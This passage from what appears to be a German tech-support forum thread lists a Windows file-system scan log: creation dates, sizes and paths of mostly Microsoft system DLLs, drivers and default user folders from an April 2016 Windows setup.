2016-04-14 03:21 - 2016-04-14 03:21 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\easwrt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-04-14 03:21 - 2016-04-14 03:21 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\BdeHdCfgLib.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00100232 _____ (Microsoft Corporation)

Jerichoholic 15.04.2016 16:13
Code:
2016-04-14 03:21 - 2016-04-14 03:21 - 00100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmapi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.V2.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzautoupdate.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00081144 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.V2.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00074424 _____ (Microsoft Corporation) C:\WINDOWS\system32\easinvoker.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00073872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00069744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveskybackup.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00058400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsNativeApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00051128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsNativeApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsdchngr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerShellext.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsdchngr.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacchooks.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacchooks.dll
2016-04-14 03:19 - 2015-10-29 20:43 - 05739520 _____ (Microsoft Corporation) C:\WINDOWS\system32\prm0009.dll
2016-04-14 03:19 - 2015-10-29 20:43 - 02629632 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsLexicons0009.dll
2016-04-14 03:19 - 2015-10-29 20:41 - 02629632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NlsLexicons0009.dll
2016-04-14 03:19 - 2015-10-29 20:25 - 06359040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NlsData0009.dll
2016-04-14 03:19 - 2015-10-29 20:24 - 04847616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NlsData0009.dll
2016-04-14 03:18 - 2016-04-14 03:18 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-04-14 03:17 - 2016-04-14 03:17 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-04-14 03:17 - 2016-04-14 03:17 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\WINDOWS\system32\msmq
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\Program Files\MSBuild
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-04-14 03:17 - 2016-04-14 03:17 - 00000000 ____D C:\inetpub
2016-04-14 03:17 - 2015-10-23 18:47 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2016-04-14 03:17 - 2015-10-23 18:47 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-04-14 03:17 - 2015-10-23 18:47 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2016-04-14 03:17 - 2015-10-23 18:46 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-04-14 03:17 - 2015-10-23 18:46 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-04-14 03:17 - 2015-10-23 18:45 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-04-14 03:15 - 2016-04-14 03:15 - 00000000 ____H C:\$WINRE_BACKUP_PARTITION.MARKER
2016-04-14 02:30 - 2016-04-14 02:30 - 00000020 ___SH C:\Users\Marcel\ntuser.ini
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Videos
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Musik
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Bilder
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-04-14 02:30 - 2016-04-14 02:30 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-04-14 02:29 - 2016-04-14 02:29 - 00021858 _____ C:\WINDOWS\System32\Tasks\{780D0947-7D0E-0C0E-0A11-050B090A1104}
2016-04-14 02:28 - 2016-04-14 02:28 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-04-14 02:28 - 2016-04-14 02:28 - 00000000 ____D C:\Users\Default\AppData\Roaming\Media Center Programs
2016-04-14 02:28 - 2016-04-14 02:28 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Media Center Programs
2016-04-14 02:26 - 2016-04-14 02:26 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2016-04-14 02:25 - 2016-04-15 11:12 - 00000000 ____D C:\Users\Marcel
2016-04-14 02:25 - 2016-04-15 01:33 - 02089590 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-14 02:25 - 2016-04-15 01:31 - 00000000 ____D C:\Users\DefaultAppPool
2016-04-14 02:25 - 2016-04-14 02:28 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-04-14 02:25 - 2016-04-14 02:25 - 01989310 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Vorlagen
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Startmenü
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Netzwerkumgebung
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Lokale Einstellungen
2016-04-14 02:25 - 2016-04-14 02:25 - 00000000 _SHDL C:\Users\Marcel\Eigene Dateien
